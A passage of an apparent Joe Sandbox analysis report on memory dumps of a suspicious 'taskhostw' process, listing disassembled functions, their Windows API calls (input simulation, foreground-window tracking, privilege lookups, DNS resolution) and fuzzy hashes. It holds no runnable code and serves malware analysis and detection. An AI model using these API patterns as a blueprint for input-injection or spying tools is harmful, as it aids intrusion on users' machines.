#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0023F910), ref: 002265BD
_strlen.LIBCMT ref: 002265EF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 9e654d2deb4512e107f4d0f696b416f6d18800ee08c624bdf5083831190d37b3
Instruction ID: ffff1603e3ea4e09990ef11127f8369558fc6fbb1b247c94d3522af5616535f3
Opcode Fuzzy Hash: 9e654d2deb4512e107f4d0f696b416f6d18800ee08c624bdf5083831190d37b3
Instruction Fuzzy Hash: 3041E231A10114AFCB14EBA4EDC9FFEB7ADAF58310F148119F9159B292DB34AD21CB50

Function 02ABE57E Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 02ABE5B4
_wcscmp.LIBCMT ref: 02ABE5CB
_wcscmp.LIBCMT ref: 02ABE648
_wcscmp.LIBCMT ref: 02ABE65F

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _wcscmp
String ID:
API String ID: 856254489-0
Opcode ID: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
Instruction ID: a998d5688eafece03d96589fdc28a01c1d24b8c4d2e135df9dabee307af5e795
Opcode Fuzzy Hash: 6218bde2304efc4676ce77e9b54fce35e9b0c74d80cbfc74f25396fbf2f328d6
Instruction Fuzzy Hash: 28312A325002197ADF21EFB4DD98BDE77AC9F44224F6401A5EC00E20A2DF35DA94CB68

Function 00238883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001), ref: 00238910

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 2c512bc55e312b9e297fa43bf1134ad67510257875f9abecf8f36569c012ba73
Instruction ID: 7f5053387b0625af69271c8e78e1de5a07453792b8529c245f068529dc652efd
Opcode Fuzzy Hash: 2c512bc55e312b9e297fa43bf1134ad67510257875f9abecf8f36569c012ba73
Instruction Fuzzy Hash: 0F31D0B0621309BFEF219E58DC49BBD77A5EB06320F544115FA51EF3E1CF70A9A08A52

Function 0023AB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0023AB92
GetWindowRect.USER32(?,?), ref: 0023AC08
PtInRect.USER32(?,?,0023C07E), ref: 0023AC18
MessageBeep.USER32(00000000,?,?,?,?,0023C07E,?,?,?), ref: 0023AC89

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: ac415bd08acc4e694bf7d91aa9e8b30dbae80a1954cb4390d24b19ab1806d66a
Instruction ID: 8c078c269f019b7db9ba48af4909b2882149b6d97f37a69ac904faf4536c3371
Opcode Fuzzy Hash: ac415bd08acc4e694bf7d91aa9e8b30dbae80a1954cb4390d24b19ab1806d66a
Instruction Fuzzy Hash: 27418EB0A10115DFCF11CF59D888B99BBF6FB59300F1895BAE8988B260D770E891CF52

Function 00210E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00210E58
SetKeyboardState.USER32(00000080), ref: 00210E74
PostMessageW.USER32 ref: 00210EDA
SendInput.USER32(00000001,00000000,0000001C), ref: 00210F2C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 717cda89b4d46b4bb61d7dc38be9c13c2b4ff13d51301e6092af39de0767f5ad
Instruction ID: 6c89dde6220c3d7118e1acadfcd1642e79d5ed7b605327276bd0c590ccde8db4
Opcode Fuzzy Hash: 717cda89b4d46b4bb61d7dc38be9c13c2b4ff13d51301e6092af39de0767f5ad
Instruction Fuzzy Hash: 8431573096020DAEFB318E268889BFA7BE9EB68310F18461AF490521D1C3F589E19751

Function 00210F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00210F97
SetKeyboardState.USER32(00000080), ref: 00210FB3
PostMessageW.USER32 ref: 00211012
SendInput.USER32(00000001,?,0000001C), ref: 00211064

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 21db4e8b5b9aa1a7b91a166a4fa9ef143c00b57204ef4b884dcfba3f575cebf0
Instruction ID: afb06f955b20dac1fd347961cef7a343bbfc2216178a58990d386abd86266850
Opcode Fuzzy Hash: 21db4e8b5b9aa1a7b91a166a4fa9ef143c00b57204ef4b884dcfba3f575cebf0
Instruction Fuzzy Hash: 95316E30D20399DEFF348E259C09BFA7BF5AB6C311F04421AE995511D1C3B589F197A1

Function 001E6345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001E637B
__isleadbyte_l.LIBCMT ref: 001E63A9
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001E63D7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001E640D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a924e7941cfc4e7a2c6cb3e46c69cb92e86ce23b4ac84934a404cc90ae716de0
Instruction ID: 0cd062be77bd1a8053b484298cb2b54361017ecd5fd5c90e89db6188e241142c
Opcode Fuzzy Hash: a924e7941cfc4e7a2c6cb3e46c69cb92e86ce23b4ac84934a404cc90ae716de0
Instruction Fuzzy Hash: 3231AF31600A86EFDB258F66CC44AAE7BA5FF51390F554429F86887191E731EC50DB90

Function 00234F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00234F6B

Part of subcall function 00213685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0021369F
Part of subcall function 00213685: GetCurrentThreadId.KERNEL32(00000000,?,002150AC), ref: 002136A6
Part of subcall function 00213685: AttachThreadInput.USER32(00000000,?,002150AC), ref: 002136AD

GetCaretPos.USER32(?), ref: 00234F7C
ClientToScreen.USER32(00000000,?), ref: 00234FB7
GetForegroundWindow.USER32 ref: 00234FBD

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 22cca9ec9ad1bf8682a03a268a2196ad00865d3fd0599a0b9ffd6acb00871255
Instruction ID: 92c0ff5dbef8efaea3199964782af3330aeb7bf26bed50786b17fb7cf9443b16
Opcode Fuzzy Hash: 22cca9ec9ad1bf8682a03a268a2196ad00865d3fd0599a0b9ffd6acb00871255
Instruction Fuzzy Hash: 92314C72D10218AFCB00EFA5D9859EFB7FDEF99300F00406AE505E7201EB759E418BA0

Function 0023C502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623

GetCursorPos.USER32(?), ref: 0023C53C
TrackPopupMenuEx.USER32 ref: 0023C551
GetCursorPos.USER32(?), ref: 0023C59E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,001EBB2B,?,?,?), ref: 0023C5D8

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: e5eb889a2daf7b383d935f01b4f0e4c95bd6c7bd58fc438edf0f42ac99414a9a
Instruction ID: 2713d2415915e3f214f2f76ddc5682fcee585df4c06de7a53374313c965a015d
Opcode Fuzzy Hash: e5eb889a2daf7b383d935f01b4f0e4c95bd6c7bd58fc438edf0f42ac99414a9a
Instruction Fuzzy Hash: 4331F676610418EFCB15CF54D858EEABBF9EB49310F948069F909AB261C731AD60DFA0

Function 0020897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00208432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00208449
Part of subcall function 00208432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00208453
Part of subcall function 00208432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00208462
Part of subcall function 00208432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00208469
Part of subcall function 00208432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0020847F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002089CB
_memcmp.LIBCMT ref: 002089EE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00208A24
HeapFree.KERNEL32(00000000), ref: 00208A2B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 3f1c194063be9c8e897d6685d1f5bf2375bc07bcc6c53555d8a9207f4a9092b3
Instruction ID: ae72f5b8faab426fcc69c0efbff1de0d36e72cd850d4cc12b63112b7655add0e
Opcode Fuzzy Hash: 3f1c194063be9c8e897d6685d1f5bf2375bc07bcc6c53555d8a9207f4a9092b3
Instruction Fuzzy Hash: 35218931E50209ABCB10DFA4DA49BEEB7B8EF40301F04405AE494A7282DB30AA15CB51

Function 001D0B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 001D0B2E

Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0021793F,?,?,00000000), ref: 001B5B8C
Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0021793F,?,?,00000000,?,?), ref: 001B5BB0

_fprintf.LIBCMT ref: 001D0B65
OutputDebugStringW.KERNEL32(?), ref: 00206111

Part of subcall function 001D4C1A: _flsall.LIBCMT ref: 001D4C33

__setmode.LIBCMT ref: 001D0B9A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: e240bfef5261553217692ac7fe710d51255e56bb044e37011c76e5f4b858f63f
Instruction ID: fd932361cb674adb1a95e4e838cd1b12e5c321aa755e4ba0e5567c6e1826300b
Opcode Fuzzy Hash: e240bfef5261553217692ac7fe710d51255e56bb044e37011c76e5f4b858f63f
Instruction Fuzzy Hash: 941127329082047FDB0577B4AC46AFE7B6E9F65320F14011BF105A72D2DF7158924795

Function 001B4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001B4560

Part of subcall function 001B410D: _memset.LIBCMT ref: 001B418D
Part of subcall function 001B410D: _wcscpy.LIBCMT ref: 001B41E1
Part of subcall function 001B410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001B41F1

KillTimer.USER32 ref: 001B45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001B45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001ED5FE

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8311d244682857cbc78bc7b8e6c1a3eef7b3f3fca1dd04eaa5dc3980d75ee950
Instruction ID: f04b83a36f8cd6fcb293ad2a1bf06822dae42b0794aaadcb9c3949a977a54a9c
Opcode Fuzzy Hash: 8311d244682857cbc78bc7b8e6c1a3eef7b3f3fca1dd04eaa5dc3980d75ee950
Instruction Fuzzy Hash: 4E21DA70904B849FE7328B24E859BEBBBEC9F11308F04409DE69E56242D7741985CB51

Function 0022647F Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,0021793F,?,?,00000000), ref: 001B5B8C
Part of subcall function 001B5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,0021793F,?,?,00000000,?,?), ref: 001B5BB0

gethostbyname.WSOCK32(?,?,?), ref: 002264AF
WSAGetLastError.WSOCK32(00000000), ref: 002264BA
_memmove.LIBCMT ref: 002264E7
inet_ntoa.WSOCK32(?), ref: 002264F2

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 239a2ca45bf5b6252dbd7afc66ab331bd95045ebbe17b406671b6803bb516e72
Instruction ID: 275f24139d1528a01e154219ee79aa8846ccafdbff0b2fdf4408e7a935132d33
Opcode Fuzzy Hash: 239a2ca45bf5b6252dbd7afc66ab331bd95045ebbe17b406671b6803bb516e72
Instruction Fuzzy Hash: F3113032910109AFCB04FFA4EE8ADEEB7B9AF54310B144165F506A7161DF31AF15CB61

Function 00208E03 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00208E23
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E35
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E4B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00208E66

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: cc0ebafbfa66ff8f482110ae7b8bb561d620a30749f877f63680799c7209df83
Instruction ID: 28655d47392b5d2fd40b21cb1cf78e2c1a9de765690f47867f670edeee42958b
Opcode Fuzzy Hash: cc0ebafbfa66ff8f482110ae7b8bb561d620a30749f877f63680799c7209df83
Instruction Fuzzy Hash: E9115A79900218FFEB10DFA5CD85E9EBBB8FB08710F204095FA04B7291DA716E20DB90

Function 02A86537 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02A8655B

Part of subcall function 02A86C42: __fltout2.LIBCMT ref: 02A86C6B

__cftog_l.LIBCMT ref: 02A86581
__cftoe_l.LIBCMT ref: 02A865B3

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: d54336d8941034582e05361e1644cacd82439544d731f9071d13c73810174bb2
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 17014B7204014ABBDF1A6F84CC418EE3FAABB18655B488515FE1858034DB36C6B1AB81

Function 00216C83 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00216C8F

Part of subcall function 0021776D: _memset.LIBCMT ref: 002177A2

_memmove.LIBCMT ref: 00216CB2
_memset.LIBCMT ref: 00216CBF
LeaveCriticalSection.KERNEL32(?), ref: 00216CCF

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: c8a11947a62ebd7a633251fc1adc5ed6493a2c3318b28068e8ca1064ea717058
Instruction ID: edcf024ef09fd84df50e6a04b7d89c1121a8ee72e994f06dc68ee97bc94c1add
Opcode Fuzzy Hash: c8a11947a62ebd7a633251fc1adc5ed6493a2c3318b28068e8ca1064ea717058
Instruction Fuzzy Hash: FAF0543A100104ABCF516F55EDC5E8ABB69EF55320F148065FE085E25AC771A851CBB4

Function 0020A15C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0020A179
GetWindowThreadProcessId.USER32(?,00000000), ref: 0020A18C
GetCurrentThreadId.KERNEL32(00000000), ref: 0020A193
AttachThreadInput.USER32(00000000), ref: 0020A19A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 2daa1c086fe747aada767dd3dae0589bfda65e2daf43438bba1152ad8a42bd8b
Instruction ID: 312d5abd17e99030e47b26629b607b2eb466447493e95496e9b6c32bc56b3b6a
Opcode Fuzzy Hash: 2daa1c086fe747aada767dd3dae0589bfda65e2daf43438bba1152ad8a42bd8b
Instruction Fuzzy Hash: 4CE03931941328BBDB201FA2FD0DED77F1CEF267A1F808024F50D840A1C6718550CBA0

Function 001B2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008,00000000), ref: 001B2231
SetTextColor.GDI32(?,000000FF), ref: 001B223B
SetBkMode.GDI32(?,00000001), ref: 001B2250
GetStockObject.GDI32(00000005), ref: 001B2258
GetWindowDC.USER32(?), ref: 001EC003
GetPixel.GDI32(00000000,00000000,00000000), ref: 001EC010
GetPixel.GDI32(00000000,?,00000000), ref: 001EC029
GetPixel.GDI32(00000000,00000000,?), ref: 001EC042
GetPixel.GDI32(00000000,?,?), ref: 001EC062
ReleaseDC.USER32(?,00000000), ref: 001EC06D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
